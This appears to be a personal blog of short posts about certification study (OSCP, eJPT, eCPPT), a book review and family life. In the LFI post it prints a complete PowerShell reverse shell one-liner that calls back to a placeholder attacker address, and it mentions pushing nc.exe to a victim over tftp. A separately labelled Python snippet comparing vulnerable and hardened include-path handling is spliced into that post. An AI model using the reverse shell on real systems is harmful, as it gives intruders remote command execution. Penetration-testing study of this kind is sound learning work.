1m0va.com

Internet, I have created another blog.  Why?  Because I wanted to play with Jekyll and I have a Raspberry Pi.  So, I give you, https://www.1m0va.com/.  It was a fun weekend project, and now I have two blogs, so I am scattered and have no idea what’s going on other than that this life is a garden, and I am having fun.  My thought is to make this blog a personal blog and make 1m0va a pen testing blog.  I need to back it up though – having it run on a little SanDisk card is a bit risky.  Ooooh, challenge accepted 🙂  More fun things to play with!

Starting my eCPPT Journey

INEWork has graciously bestowed on me the gift of the INE Premier Pass.  In there is the PTP course, which preps me for the eCPPTv2.  So I am gradually going through it, and I forgot how many slides there are.  The class goes right into assembly, which is fine, but not too much fun.  I hope there are more labs and this gets more fun, because I am picking up little nuggets, but not a lot at the moment.

I have a year of the Premier Pass, so I suppose a year to go through the test, and I am going SLOW…. I need more “impact hours” on it.  At least 1 hour a day.  I can do this.  If you are reading this, you can check out my notes.

The Wealthy Gardener

I generally start by listening to books, and if the book feels like it’s a wealth of knowledge, then I will buy a hardcopy.  I did this for The Everyday Hero Manifesto by Robin Sharma, and I did it for the book that I am currently reading, The Wealthy Gardener by John Soforic.  I can see why the book gets criticism in some ways – it follows the “Think and Grow Rich” mantra that the world is working in your favor, but it takes this further, to a higher power working in your favor if you meet it halfway.  Why not?  I mean, I believe that there is more to life than we yet know, and all I know is my higher power has always been there for me.  Jesus said, “With man this is impossible, but with God all things are possible.”  Also, the lessons in this book about how to grow financially independent all make sense.  I like it, and I think it’s a good book to at least read and think about :).  So how did I come across this book?  Well, I stumbled onto Kristina Karlsson’s podcast through Robin Sharma, she recommended the book, I picked it up, and here we are.  Check it out:  https://wealthygardener.com/.  You won’t be disappointed.

Why am I not on Jekyll & Github?

Yes, WordPress is a place for a slew of vulnerabilities and not really seen as a good place to showcase my “technical work” as WP is generally for newcomers and easy-peasy blogging.  Well, one, I am fortifying this blog as much as I can to prevent it from getting hacked and two, I just haven’t learned GitHub yet.  I’ll get there.  Let me work through a few pen testing courses and in due time, I’ll move over.  Rome wasn’t built in a day, everyone.

Countdown to eJPT

10 days till I take the eJPT and I feel pretty confident about it.  I have done the three black boxes at the end of the course, and while they were a bit tricky, I feel like I have the fundamentals down after studying for the OSCP first.  With the kids at home, work taking priority (gotta put food on the table) and other various things (running, reading, meditating, living life), I am finally at the point where I just need to take the test.  I have heard not to overthink it.  I am not sure if I will go back to the OSCP (eCPPT, maybe?), or move on to more relevant certs in my current career path or not.  In either case, I really, really like pen testing and it is really fun.  I am currently working through Wreath on TryHackMe and having a blast.

RCE using LFI attacks – happy St. Patty’s Day!

Top of the mornin’ to ya…

I like to wake up early to study. I mean, really early. Like today, when I woke up at 3:30 am to tackle this issue of gaining remote code execution (RCE) using Local File Inclusion (LFI) attacks. I was hanging out at a coffee shop till pretty late last night and couldn’t get it. This AM, I realized a few mistakes in my URL, and it looked like I was able to upload nc.exe to the victim machine using tftp. Once I did this, I could execute nc.exe to call back to my machine.

This got me thinking a bit though, and I started wondering what I would do if I didn’t have tftp on my vulnerable Windows box. So I looked up a few reverse shells here, but most of them were built for a Linux victim machine (i.e. bash commands).

I found one that supposedly works with a powershell command:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

I also need to think a bit about this. I need to explore more about how to execute a command on a remote machine that would send a shell to my attacking machine (reverse shells, son). Ippsec’s channel is a go-to for a lot of this.

If I don’t have tftp to upload nc.exe through an LFI in PHP or other web application code, then I would need to get the reverse shell to work in one command – I thought that PS would do it, but nada. Ippsec actually had trouble with this too on Bashed, so actually, that means I might be doing it right.
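As an added illustration (not code from this post or from the lab course), here is the pattern behind an LFI bug of the kind discussed above, a page parameter glued straight into an include path, next to the allowlisted resolver a developer would use to close it; the page directory and page names are assumptions:

```python
import os
from typing import Optional

# Assumed layout: legitimate includes live here and only these names exist.
PAGES_DIR = "/var/www/pages"
ALLOWED_PAGES = {"home", "about", "contact"}


def vulnerable_include_path(page: str) -> str:
    """Mirrors include($_GET['page'] . '.php') with no validation.

    The traversal in the request survives into the path, so any readable
    file on the box (including one the attacker just uploaded) gets included.
    """
    return os.path.join(PAGES_DIR, page + ".php")


def hardened_include_path(page: str) -> Optional[str]:
    """Return a safe path for `page`, or None when the request is rejected."""
    # 1. Allowlist: only known page names are accepted, so traversal
    #    sequences, absolute paths and embedded NUL bytes never reach the FS.
    if page not in ALLOWED_PAGES:
        return None
    # 2. Defence in depth: even an allowlisted name must resolve (symlinks
    #    followed) to a location inside PAGES_DIR.
    root = os.path.realpath(PAGES_DIR)
    candidate = os.path.realpath(os.path.join(root, page + ".php"))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def is_rejected(page: str) -> bool:
    """Convenience check used when reviewing request logs for LFI probes."""
    return hardened_include_path(page) is None


if __name__ == "__main__":
    # Constructed request values: one legitimate page and three LFI probes.
    for req in ("home", "../../../etc/passwd", "/etc/passwd", "home\x00"):
        print(f"{req!r:28} vulnerable -> {vulnerable_include_path(req)}")
        print(f"{'':28} hardened   -> {hardened_include_path(req)}")
```

The vulnerable resolver keeps the `..` segments and NUL bytes in the path it hands to the include, which is exactly what web-server and WAF logs should be flagging; the hardened one rejects everything except the three known pages.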

Listening to Irish jigs right now – takes me back to when I went to Ireland with my wife.

Sláinte!

…and I just extended my lab time.

This is a journey, folks. And my journey includes a kid and a full-time job. So right now, I am hanging around Chapter 13, Local File Inclusion vulnerabilities, and in order to pop 10 boxes and finish the labs, I am going to need the extra time.

One of the things they say in the exercise is a Lincoln quote – “Give me six hours to chop down a tree and I will spend the first four sharpening the ax”. I think I just need a few more days, not hours, to sharpen. 🙂

It’s a little tricky, and I really like how OffSec trains you in the labs to think about the cracks. Those cracks that can get you to root on a box. Off to LFIs!

Day 53 of the OSCP!!

I am slow – like really slow. I got through the enumeration section of the book pretty steadily, but now that I am working on Buffer Overflows, things are going slowly and I am not as “quick” to pick the book back up.

I wake up at 4 am every day eager to study. After checking emails and reddit, I get in and make a little bit of progress. I really have to start putting more of my heart into this or else this OSCP is going to drag…

People take the test, what, like three times before they pass? I really need to get more wrapped in it, or this is going to be a really long process. I think I am going to buy 90 more days of lab to finish out the book, and then just go nuts on studying through hackthebox.eu and vulnhub. Take the test at the latest I can take it, and then if I fail, maybe 30 more days of lab and studying and then take it again.

I have a baby boy due in July so, yeah…. life happens, but it has always been my passion to pass this cert. I got this. Wish me luck.